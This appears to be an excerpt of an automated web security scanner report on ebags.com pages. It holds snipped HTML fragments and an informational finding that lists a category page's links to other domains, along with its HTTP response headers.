<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.4. http://www.ebags.com/category/travel-accessories/20014443 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/travel-accessories/20014443

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/category/travel-accessories/20014443?ne=100

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/106800_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/47360_15_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/47450_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/127321_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/47391_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/107612_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/47402_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/47422_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/106803_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/119373_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/18643_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/5733_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/67303_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/94553_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/107614_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/107704_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/127324_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/136614_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/143934_10_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/18644_11_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/106795_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/107615_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/113065_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/122015_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/130505_19_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/143935_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/143945_9_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/87345_8_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/115846_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/143936_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/16536_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/47366_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/87376_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/89786_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107687_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107697_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/113067_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/125167_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/18647_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/47357_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/47367_12_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/106798_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/107678_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/117748_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/47388_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/47438_12_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/136619_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/47349_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/47409_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:53 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 117508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
